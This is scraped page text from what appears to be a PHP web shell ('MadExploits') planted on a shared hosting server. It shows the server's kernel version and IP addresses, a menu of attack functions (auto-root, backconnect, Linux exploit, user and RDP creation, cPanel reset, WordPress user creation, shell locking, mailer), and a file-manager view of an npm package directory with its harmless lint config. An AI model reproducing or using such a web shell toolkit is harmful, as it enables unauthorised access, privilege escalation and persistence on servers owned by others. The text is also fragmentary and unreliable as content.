Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.225.98.100
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
fs-vacuum /
[ HOME SHELL ]
Name
Size
Permission
Action
.eslintrc
421
B
-rw-r--r--
.npmignore
13
B
-rw-r--r--
.travis.yml
215
B
-rw-r--r--
LICENSE
736
B
-rw-r--r--
README.md
1.19
KB
-rw-r--r--
package.json
1.52
KB
-rw-r--r--
vacuum.js
3.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc
{ "env" : { "node" : true }, "rules" : { "curly" : 0, "no-lonely-if" : 1, "no-mixed-requires" : 0, "no-underscore-dangle" : 0, "no-unused-vars" : [2, {"vars" : "all", "args" : "after-used"}], "no-use-before-define" : [2, "nofunc"], "quotes" : [1, "double", "avoid-escape"], "semi" : [2, "never"], "space-after-keywords" : 1, "space-infix-ops" : 0, "strict" : 0 } }
Close